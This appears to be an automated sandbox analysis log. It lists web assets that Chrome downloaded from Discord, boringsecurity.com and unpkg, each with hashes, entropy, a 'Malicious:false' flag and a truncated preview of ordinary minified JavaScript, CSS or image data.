                                                                          SHA-256:D8B34E7500C8AB6C16FE2C5A482FAAD751A449CC431EF3242AF6DE0A4F7AEC16
                                                                          SHA-512:6EE1A8A5CFF62F91264D304F10460A6A366D0F8A2048F9A97C9FEA57340656163A766EDD68C222E7BAA7173AE1843AFD876E983631CDDE3DB66065CFEC897D61
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/13798.5d1df801cfc219755d66.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["13798"],{334782:function(t,r,n){t.exports=function(t,r){for(var n=-1,e=null==t?0:t.length;++n<e&&!1!==r(t[n],n,t););return t}},253792:function(t,r,n){var e=n("766665"),o=n("561662"),c=Object.prototype.hasOwnProperty;t.exports=function(t,r,n){var u=t[r];(!(c.call(t,r)&&o(u,n))||void 0===n&&!(r in t))&&e(t,r,n)}},366726:function(t,r,n){var e=n("330124"),o=n("466731");t.exports=function(t,r){return t&&e(r,o(r),t)}},855023:function(t,r,n){var e=n("330124"),o=n("39417");t.exports=function(t,r){return t&&e(r,o(r),t)}},766665:function(t,r,n){var e=n("424498");t.exports=function(t,r,n){"__proto__"==r&&e?e(t,r,{configurable:!0,enumerable:!0,value:n,writable:!0}):t[r]=n}},809408:function(t,r,n){var e=n("146007"),o=n("334782"),c=n("253792"),u=n("366726"),a=n("855023"),i=n("552500"),f=n("561449"),s=n("619754"),p=n("310524"),b=n("904526"),v=n("552647"),j=n("540956"),l=n("925400"),y=n("493118"),x=n("789078"),d=n("725502"),h=n("5
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (22967)
                                                                          Category:downloaded
                                                                          Size (bytes):23022
                                                                          Entropy (8bit):5.565256802729273
                                                                          Encrypted:false
                                                                          SSDEEP:384:JOvnnCPseZB/iEADKe5Zpq9qrIPoEN14/r3iy0Qwg6rH3+C/Kt1Pztn:sfnCUKdlgd
                                                                          MD5:7AD1AFEED38EAD2CEE80625D7251950E
                                                                          SHA1:5BD8DA6DE16D763AAE30E4BD5C26C490368C7F22
                                                                          SHA-256:A3C475F83C0A17484A36566232AE94B76024829010D706CA6B2C161C0DF6D6FC
                                                                          SHA-512:6E8B037CB1C7EACDC72DE850DC797EB611E3089966F51475D574B3851810C6123703AC417F24D034BD9C4FD538604943AD29C9DDCA93E257BC9B1A58C3761DF5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/67079.8c773b08bd63e44275b8.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["67079"],{437822:function(e,t,n){"use strict";let s;n.r(t),n.d(t,{PasswordResetResult:function(){return o},default:function(){return v}}),n("70102"),n("860677"),n("506083");var o,l,a=n("759843"),i=n("171718"),d=n("872717"),r=n("95410"),u=n("913144"),c=n("448993"),E=n("307439"),_=n("605250"),p=n("21121"),f=n("776502"),h=n("393414"),A=n("271938"),S=n("350522"),O=n("840707"),I=n("772017"),N=n("49111"),C=n("191349");let m=new _.default("AuthenticationActionCreators"),T=null;function R(e){let t={type:"LOGOUT",...e};u.default.dispatch(t).catch(e=>{var t;throw m.error("Error while dispatching LOGOUT",e),null===(t=window.DiscordErrors)||void 0===t||t.softCrash(e),e})}function y(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:N.Routes.DEFAULT_LOGGED_OUT;R();let t=(0,p.getRootNavigationRefIfInExperiment)();null!=e&&(null!=t?(I.default.popAll(),t.navigate("auth")):(0,h.transitionTo)(e))}(l=o||(o={})).MFA="MFA",l
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):2421
                                                                          Entropy (8bit):7.8528504199126665
                                                                          Encrypted:false
                                                                          SSDEEP:48:qnVxvxeRr/6r6ywmE810X8s3xz+PRImGOTVO0V5nOGUhhdvHzwavVH8e6Rh:qnVxeSXrE8GX8s3x2ufOTVvnOGUVzcRh
                                                                          MD5:5452DE999C71539D4D43B4332F3605CE
                                                                          SHA1:CF7393BDB56F70B10A976F1A662812B2202092B5
                                                                          SHA-256:12C42DE4EE9917A52A2A9166A5BDA4E195F44A7E1A8F9F8D31CF197743BF1EC4
                                                                          SHA-512:83E7CBA481DF02ACFEA73EE75B85FB4A6258327C0C5E14A0A3C6712AA00CED3E3EF57F9BF8F1A9A43CF5C37126C5AAD56844392925CD8C4D849DACAA59D58437
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75"
                                                                          Preview:.PNG........IHDR...@...@.............PLTELiqTWU......[]\...SVV?CD7:;RSP...GLKVYYmsxDHHx........ntxW]a`eh.! #"#%#...'*)...$''*,-&'%TY[Y^aOSU^dgGKLJOQ....11cilCGH;?@puxinr......256v{~|..........................$.W.....tRNS.~.f-....UB..........sT....pHYs................RIDATx..W.v..UV*M.t...W..v.....w@...L..s..8.xqq..E.K{.p......._..=..~....C..../.o.......i..(e...._......O]PJ..l..j....&.....p.i...`..*I..j.3Z{.Ux.......m?...N...30!p.R..w..].......^.....TJ.)..T.x...I...6Dv.U.m.%.**...JN.KJyg..........FV.Q*3.I).DJ"..3..4...z.:w:.-.V.SEI...N..uUqZ.R......m.N.W..u....n.W~.+.:.......N?.........Y..X..K....!F...P......s..%'p..l.l{.f=.....h.z..R*Mp......y...V..X.Jt*..Ix.*.KF).....y...Y.n:. .!.K. DRL...h.f..Jk.1.>.......dUA.y.V.._K*)...U..5..u]....'q.ikO..o+^.-.Z.A.....m.0........@.^6W..0.R.G.._..a&..RR.?.!.........x....p.%.,....?@.UV.H...T(^y|.dm.".....Jr..D$L.`..,.Y{N2...91..].w......4.@.......0+e...B@,.....Bfg.s....y...M..&.T}..n.]...Z..@),.]..:
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):124
                                                                          Entropy (8bit):4.940022110829891
                                                                          Encrypted:false
                                                                          SSDEEP:3:k0WYL12ASBMfW6IWeDQwJEWueW6QfpX/W6Qen:UYR2AQBQ8EWy6EpXO6h
                                                                          MD5:37A8E17BCE5E460587B5F451E55CC5DC
                                                                          SHA1:6CE43900D13465A6EB3CEF487A120994367084E3
                                                                          SHA-256:F2249B8912C3D1E1406E32273E4EC12984A119583AA8D54F8A2A25747DA53300
                                                                          SHA-512:FEC6BE87A579FAC561917AF1294A10CA05F59E198D80B3F821B451DB08019B72C009724883F0FBCDF99B7AC185CC4EC3D89D995139C7CC8CDD691819C6E87437
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/gCkYQnlwM1KFyjXElH0ki/_ssgManifest.js
                                                                          Preview:self.__SSG_MANIFEST=new Set(["\u002Farticles\u002F[slug]","\u002Fclasses"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65201)
                                                                          Category:downloaded
                                                                          Size (bytes):141072
                                                                          Entropy (8bit):5.268599274469913
                                                                          Encrypted:false
                                                                          SSDEEP:1536:gvmNg6kMudjY+o3F36qmk1S/qcnde//PQv:g7UN6qT1S5cX4v
                                                                          MD5:343C4EF1E04D459C3514BBC80BD85605
                                                                          SHA1:FF71AE84730B74AA4E914912224AD8112DC3B8ED
                                                                          SHA-256:187F5491359D421B4B34B87D5275948D1E3E75D24ECB5C65B3440566D65DAED0
                                                                          SHA-512:7EF29F7BB02B930E59E0EAD16C0676DAEBDF22A8DB2A01EEF6DA5FE162BCD4C086AF9E9C457490578230D086DB78C4710500672B8248D040636A714A43347F3D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/framework-281bd828f4ecdac7.js
                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{53746:function(e,n,t){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var r,l,a,u,o,i,s=t(50959),c=t(22962);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):164
                                                                          Entropy (8bit):5.209579732658929
                                                                          Encrypted:false
                                                                          SSDEEP:3:tLvNR9dXKq8NR9dXLZHKVRNxY3I4Y6JL9Wg5VXRsO+nA+dfzhH1o:5vkrZur+3I4RLb/RsOKA+dfzhH2
                                                                          MD5:698FE8BE9BC378B8795422349599B808
                                                                          SHA1:B58A1F49D7900B47D17031AA2C06EA306B73F9DB
                                                                          SHA-256:E7C0B17D5EEF014F1758C2A34FC8BB6730EF9C462A45F44635F9244A811BF053
                                                                          SHA-512:560D0D761C5D81222EAD5DD9112C437C6472FB721153F9B14A2670E828871F8737B73C9E1CB33E29CF9450739364342260C51F481BEFB8B63913685A5068BDD7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/d8d8bb7602e34b57bbef.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["72435"],{200683:function(p,c,s){"use strict";p.exports=s.p+"3f46bbecb4287c0a829f.woff2"}}]);
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):180
                                                                          Entropy (8bit):4.921485085907038
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+ZacvTnARcLnkDmJS4RKb5KVErcHYWNTWi7eLFOyTIXGUNfHFQJJqGrqL0:t6AbZ/Ikn4mc4slmYWBWzLRI2ylQJAe
                                                                          MD5:B1D4C5E276E3AAA8EC41E6014DD572B2
                                                                          SHA1:B5B63A8B35223277D75C79B2AABD8221FDA383EB
                                                                          SHA-256:7CF5996F7AB483BD985B3DE5BFBCF50A2B22A7B473E8011E5C993D9830AF9D12
                                                                          SHA-512:8E4C954D96FBDA407E87FA65859FE758FC83F2DA0C6D7C07824926BFB0BCDF4F40DE057C5DD1D7EE0890C5287D2ED2EC8FDEFBDF317B46FE222339894E0A559B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):66368
                                                                          Entropy (8bit):4.959088966443662
                                                                          Encrypted:false
                                                                          SSDEEP:1536:LaJ2DPUZNyRIY7+eWAb0QpjG/V+vHWoRAPaMMK:yZNIe/oiPTv
                                                                          MD5:1F8D5832684C8CD75023FDF6BCDE1136
                                                                          SHA1:ABC64F5F4C0D63BC693D4E353BF91D2293D24C33
                                                                          SHA-256:9EBF313E95679C940D8480317B7E5A37B2E6A53B33B05340D33945145307FE15
                                                                          SHA-512:E508C8AB351B4CC11DACCFCE359C49436EFD63C4CF00A90A166942B6D89709DF657816FE05D8C4DDE7FD54557E713E43D98B1DD9A1E41B21958936BAB587CAEA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/webMinimal.be9c931086cfd9898b0f.js
                                                                          Preview:!function(){var a,e,d,f,c,s,b,p,j,t={386177:function(a,e,d){"use strict";a.exports="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNyIgaGVpZ2h0PSIxMyIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48ZyBjbGlwLXBhdGg9InVybCgjYSkiPjxwYXRoIGZpbGwtcnVsZT0iZXZlbm9kZCIgY2xpcC1ydWxlPSJldmVub2RkIiBkPSJtMCAwIDUgMiAxLjUgNEg3VjBIMFptMCAxMyA1LTIgMS41LTRIN3Y2SDBaIiBmaWxsPSIjZmZmIi8+PHBhdGggZD0iTTYuNDIzIDYuNUM2LjQyMyAzLjMxMiAzLjc4My43NTYuNS41MThjMy4zODYuMjM2IDYgMi44NTUgNiA1Ljk4MiAwIDMuMTI3LTIuNjE0IDUuNzQ2LTYgNS45ODN2LS4wMDFjMy4yODQtLjIzNyA1LjkyMy0yLjc5NCA1LjkyMy01Ljk4MloiIHN0cm9rZT0iI0Q0RDlEQiIvPjxwYXRoIGZpbGw9IiNENEQ5REIiIGQ9Ik0wIDBoMXYxSDB6TTAgMTJoMXYxSDB6Ii8+PC9nPjxkZWZzPjxjbGlwUGF0aCBpZD0iYSI+PHBhdGggZmlsbD0iI2ZmZiIgZD0iTTAgMGg3djEzSDB6Ii8+PC9jbGlwUGF0aD48L2RlZnM+PC9zdmc+"},192051:function(a,e,d){"use strict";a.exports="data:image/svg+xml;charset=utf-8,%3Csvg width='8' height='7' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M3.195 6.565a1 1 0 0 0 1.6 0l2.992-3.98a1 1 0 0
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):1957926
                                                                          Entropy (8bit):5.208259803441734
                                                                          Encrypted:false
                                                                          SSDEEP:49152:/4EqPsQvJgz41heRH0RPCsv4W9pEaktyZTQ02JKdFRMApllEn2BBOu29Qoi5z57h:fyZTQ02JKd5
                                                                          MD5:67F732E7B1AB4DF55FC10590B3248142
                                                                          SHA1:1D18D1C2993706948C2FF170FE7C03FF93BA6EAB
                                                                          SHA-256:FEC5496BAD8AEF41EF01BFC2EA3B022CDB6E3E3925AD2619960B1419D5F82BA6
                                                                          SHA-512:8EC31E3D861E0665310ABEEBF62E9364D457D8537D1A68DA637048D5E24262080429A677CF81FD2BE92355967C43BEDC65AAA387A26E16CFA86044E66ED3B909
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/app.83f01b3df65cd0fa3bb9.css
                                                                          Preview:.heading-sm-normal_bc6423{font-family:var(--font-display);font-size:14px;line-height:18px;font-weight:400}.heading-sm-medium__6c287{font-family:var(--font-display);font-size:14px;line-height:18px;font-weight:500}.heading-sm-semibold__01ba6{font-family:var(--font-display);font-size:14px;line-height:18px;font-weight:600}.heading-sm-bold_f10b5a{font-family:var(--font-display);font-size:14px;line-height:18px;font-weight:700}.heading-sm-extrabold_ee1ae8{font-family:var(--font-display);font-size:14px;line-height:18px;font-weight:800}.heading-md-normal__6b240{font-family:var(--font-display);font-size:16px;line-height:20px;font-weight:400}.heading-md-medium_dd6c29{font-family:var(--font-display);font-size:16px;line-height:20px;font-weight:500}.heading-md-semibold__574c7{font-family:var(--font-display);font-size:16px;line-height:20px;font-weight:600}.heading-md-bold__27797{font-family:var(--font-display);font-size:16px;line-height:20px;font-weight:700}.heading-md-extrabold__2f501{font-family:va
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):26192
                                                                          Entropy (8bit):7.988846311209446
                                                                          Encrypted:false
                                                                          SSDEEP:768:akKeYyz7IV8nUB87kHpyHA000C5W4KszQ3:dYVlB87kYHA0p4xQ3
                                                                          MD5:B290BE8F94CB56EE0EA82017816B402B
                                                                          SHA1:0168F21AB768EC4F3248D30AAB762EC5FE45FE6A
                                                                          SHA-256:51062AD26A4F365D8CAA68DEB4EFDF9A689B2286B53B1F0961F129B80076D586
                                                                          SHA-512:9908456A6B6BEC21D2925A4A4D637B7913257B3F48B9DAA269BC3C61333B7ADB33B563AB6668BF1BFE3F9D6C663E6BA2900C8594A08CBDAB6C2128A066FC75A9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..u\..?.v..I.Jww.....(!b..(*..(..vw..k....R..s_..u. ......|.G.....y..y.......n.._...Z}d...._.*..t..QkG.VQ.........a..?_.N:......m_I.........G-W*.......t.{..7...o.......M.. %........^.'+.p......l.x.&....T..~.q.....U...Z....K.....QX..2[...z..._......*.s.......J...z....{Ui.o..B.uP.{.|C.....{..{.U.....z...:.p..h.e.^f......p.....{.....^.....I......,B.g$.......3.^.}..P..I/.>.E.....p.."T~F....`.*?#...G........#X...Hz...,B.g$.......3.^.}..P..I/.>.E.....p.."T~F....`.*?#...G........#X...Hz...,B.g$............G.....|..."..4.?j#..[.Q..V7|...z....S...g........$.z........j.q....6..44....mP.....?j.lw.....p.^...2..u....0.~........H.+1)|.'.5..\n....^..T.;.../:Hc+....7.B.T<l%..[...>Kv......f..H.?...S..X........a..Hm.......G....7.CR.g-.b...^.g*L.Q.&y(..Bu9+gY......l....Y..4?...a.. .........P...m..D.'.....Gg..l....j..`c.@.kq..7.ss.xn....sEA4cJ{..U.Xm..d.Orm.W....OxR..p5Xj3."MG.....s4..az.....Kyq{..._.:
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Java source, ASCII text, with very long lines (5528)
                                                                          Category:downloaded
                                                                          Size (bytes):5589
                                                                          Entropy (8bit):5.040299679518388
                                                                          Encrypted:false
                                                                          SSDEEP:96:kHPxYcQSOYV7gD5+ZfaRLC3IrAd8fkqciggjYJN890kql3Qcz:kvxYcQSOYVB4zcMEJNqYtD
                                                                          MD5:30E61B502B2454820800C6B13B364F38
                                                                          SHA1:B581B4F635EE78AF40216A13083F31B95414FA19
                                                                          SHA-256:A7B6114DFE292E0E4A87063030DC27FDD70B12849C27CDA60C5577E3DFAE350B
                                                                          SHA-512:D0FB81FB41E74C340A4FFB14E324E10AD436F3BF773BBCDF14D452D19171E7FD164A71770C0B8AF2651C87EFB105EB89815003C6BA6E9E86C79FC7E149EEB836
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/__polyfill-node.events-e75a050f.js
                                                                          Preview:import{g}from"./bundle-b2289479.js";var w;function v(){}v.prototype=Object.create(null);function f(){f.init.call(this)}f.EventEmitter=f;f.usingDomains=!1;f.prototype.domain=void 0;f.prototype._events=void 0;f.prototype._maxListeners=void 0;f.defaultMaxListeners=10;f.init=function(){this.domain=null,f.usingDomains&&w.active,(!this._events||this._events===Object.getPrototypeOf(this)._events)&&(this._events=new v,this._eventsCount=0),this._maxListeners=this._maxListeners||void 0};f.prototype.setMaxListeners=function(t){if(typeof t!="number"||t<0||isNaN(t))throw new TypeError('"n" argument must be a positive number');return this._maxListeners=t,this};function p(n){return n._maxListeners===void 0?f.defaultMaxListeners:n._maxListeners}f.prototype.getMaxListeners=function(){return p(this)};function y(n,t,e){if(t)n.call(e);else for(var r=n.length,s=c(n,r),o=0;o<r;++o)s[o].call(e)}function E(n,t,e,r){if(t)n.call(e,r);else for(var s=n.length,o=c(n,s),i=0;i<s;++i)o[i].call(e,r)}function x(n,t,e,r
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 2560x1440, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):271024
                                                                          Entropy (8bit):7.959522659004946
                                                                          Encrypted:false
                                                                          SSDEEP:6144:O5SfUaK7u4fsOPlsWlDx0v3LU5DBGJe/l6X9qT+DDVxY9bd:O5W0fsOPN0v3LQBGJe9DT+fYd
                                                                          MD5:56FEF5F6D34B3CDB3C2C703DE94B2590
                                                                          SHA1:B32A6521EC96105F764017E6EC2C7DED1891CF82
                                                                          SHA-256:F88A9E7514A37E97B728587487DEEBAD32496B8954F18A1EAE2BBAEE054984EF
                                                                          SHA-512:1D213448FEA0A8AC12C8453E50681A87828E1537EE34FBA0E60B9B3BEF81BEC0E7084FBC5ABC8FF37E552CC8D8A44F7897BD4DF80076D4412151938CB9076C8F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/images/steel.jpg
                                                                          Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9131d1a2-bd63-674d-882a-5ea481f59412" xmpMM:DocumentID="xmp.did:1B086B0DC7EA11EC8FB0A9EDF2FB2654" xmpMM:InstanceID="xmp.iid:1B086B0CC7EA11EC8FB0A9EDF2FB2654" xmp:CreatorTool="Adobe Photoshop 23.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:300930d1-4af6-4e47-9401-2236f1a7ba58" stRef:documentID="adobe:docid:photoshop:d140c537-ee50-4a46-b34e-ea0d23da1369"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..................X..."........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 828 x 276, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):379566
                                                                          Entropy (8bit):7.955527042604531
                                                                          Encrypted:false
                                                                          SSDEEP:6144:blTeORyWhDfYldGtJLhUiDF6dYPhx2IL6wpxQLFgtw/DE1/lh6dh0c+BBSltueAe:ByOEldGtlj4dYPyILtp2RgtgA/lQszBg
                                                                          MD5:D3AC9164D7F113A7C9F8DB140A9DC588
                                                                          SHA1:BD2324250E8A7EE5D20CFB76B398E9581F289BFF
                                                                          SHA-256:EF96A0737DACFBB4295343CEC69651FE068A0EC07BEAE7174BB36856C28E132C
                                                                          SHA-512:90EFB0F12E24A4250CBDFAA6072A2229478C43283C09D919F6D046C175C47E8F2253321F65196DB3FDA44C7423BA998D3C650EF62647156C66F0224849558B60
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/boring-security.png
                                                                          Preview:.PNG........IHDR...<.........a.......sRGB....... .IDATx^L..#9.%.W........^..OX........vweD..f..2.j.J>.0.F#....=z.............fF..D..........IL..a....`..L..q.................D.........A..4.P...Z..Dhf.\U<...s-.H"daD..!"fBB.{..3..;....3!"F...............D.....f.."2.jM.."b&f.sf.{.....3..s.&5........Mu.ID.l.".."..k.!..o..v<...?..G.."....zk."LDs.......<..m.y....wD\k....?..v....j-..#.m.8..."..,.2s.... "..@.+..1.!.........D$......hmcF..@. B...f.......H.y.1TU...~.........I...DH..N.D...("Ld..h..Z+.3.3..1.q<......#!2..gdB.S&.9....m..3c.._.E83....vW..>[k?~.......|.k2..x.....o....Xd.af.q...G.....|.c..9.),[..q03.......=3..">.........1.~.k..x...4#...>>...i.f.........|..k..v?.H....f.p....5..8....o_.4ms..b...Q.e.y.....}.}........|>k."@..Z..57...........V0.@DDW..9.....22..9..eK...y>=.5.i....DH...n....L..n..]:.......DL.`n.P/w73D..Dl.=...7&...[..$fUE..<.|...f>....>>>.}...s"...nfe..q..##<Zk...6..0D<..........y| ...?.....?~..o..y....{#b...._~..l.......
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (14756)
                                                                          Category:downloaded
                                                                          Size (bytes):14811
                                                                          Entropy (8bit):5.48085263198548
                                                                          Encrypted:false
                                                                          SSDEEP:192:1ZUkq6SSREepcAVsx4FcHKVoUUSg5STLwRLHvsk1L5eE8RTsyT:1qkq6SSREc1V3Vo/ULwRHVeEEn
                                                                          MD5:C74D5B820B3ADA88A22CF587816C396F
                                                                          SHA1:6234D885E01DF794F61CB4F40F67B2FB9F7ADEBD
                                                                          SHA-256:F693E1A4E6FAC3C7D5A97CF8EBC5E28EC4C1AEBEAB83580734CA143563EFDB14
                                                                          SHA-512:E36FF570E5B88FD158A9CF2E65F7A3D44AAEFE743CAFE28225ED16669FA892DB3CBAC33C1E80962A9920F5CAA6D3E7A2E40F29D56C8F5F328523AFE7869021EF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/21396.259a270b7e3f8803a333.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["21396"],{656280:function(t,r,e){t=e.nmd(t),e("424973"),e("781738"),!function(r){var e,n,a,i=/^\s+/,s=/\s+$/,o=0,f=r.round,h=r.min,u=r.max,l=r.random;function c(t,e){if(e=e||{},(t=t||"")instanceof c)return t;if(!(this instanceof c))return new c(t,e);var n=function(t){var e={r:0,g:0,b:0},n=1,a=null,o=null,f=null,l=!1,c=!1;return"string"==typeof t&&(t=function(t){t=t.replace(i,"").replace(s,"").toLowerCase();var r,e=!1;if(q[t])t=q[t],e=!0;else if("transparent"==t)return{r:0,g:0,b:0,a:0,format:"name"};if(r=P.rgb.exec(t))return{r:r[1],g:r[2],b:r[3]};if(r=P.rgba.exec(t))return{r:r[1],g:r[2],b:r[3],a:r[4]};if(r=P.hsl.exec(t))return{h:r[1],s:r[2],l:r[3]};if(r=P.hsla.exec(t))return{h:r[1],s:r[2],l:r[3],a:r[4]};if(r=P.hsv.exec(t))return{h:r[1],s:r[2],v:r[3]};if(r=P.hsva.exec(t))return{h:r[1],s:r[2],v:r[3],a:r[4]};if(r=P.hex8.exec(t))return{r:z(r[1]),g:z(r[2]),b:z(r[3]),a:z(r[4])/255,format:e?"name":"hex8"};if(r=P.hex6.exec(t
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (43317)
                                                                          Category:downloaded
                                                                          Size (bytes):43513
                                                                          Entropy (8bit):5.1911875269852485
                                                                          Encrypted:false
                                                                          SSDEEP:384:XUx6jP6hnCfdkRFhuJL2sk8557UTFv9SaOLNnUv/7mwhwKTQynv4M:Pj72sk8557UTFVLI6mwhwKTLV
                                                                          MD5:DB8CFA70A2B730C78EDA31DAA4D5DFA3
                                                                          SHA1:FE4535FC162AB197C60DF8A6ABEFFF7D6BD62E94
                                                                          SHA-256:965D322339309077155DC44FC2629629616BD0AC1AD74C63D405CEF62018A197
                                                                          SHA-512:5A8A9806A13BE0CFA59B0D64D883461DAD7C34D8C60118B1B6D52C16E896D8520BCA8D9EDC4E36330346568ABBF93860BD4E446DB5ECE4AD88517D2F57E89916
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.css
                                                                          Preview:@font-face{font-family:Gunplay Regular;font-style:normal;font-weight:400;src:local(""),url(/fonts/gunplay.woff2) format("woff2")}../*.! tailwindcss v3.0.24 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid #e5e7eb}:after,:before{--tw-content:""}html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:Open Sans,sans-serif}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}table{text-indent:0;bor
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (8396)
                                                                          Category:downloaded
                                                                          Size (bytes):17608
                                                                          Entropy (8bit):5.390406154299591
                                                                          Encrypted:false
                                                                          SSDEEP:192:Ky40zaJTeDRr8lzeG8OcrxxWTsTx8g50yThrYyZSCw:Ky405RceG8OFwaK0OhrvSt
                                                                          MD5:02D215699D0C78BCCF58EB7F557A9C2C
                                                                          SHA1:4B395E0768E1C06FAB21BDEF4A54B4DDAEE877FD
                                                                          SHA-256:541D08C6D7D832F62DEA0B778F29933784A402597D89DC65E8CD136FE0E2F56E
                                                                          SHA-512:F6B9D00902648D29F1BB9CDA987FD95A938CD49F7C72AEDAFAE55BD404C0466929FA1FA2706C5E08064ADA3641A6E39606D4806245F1E642897C6B4A3690E087
                                                                          Malicious:false
                                                                          Reputation:low
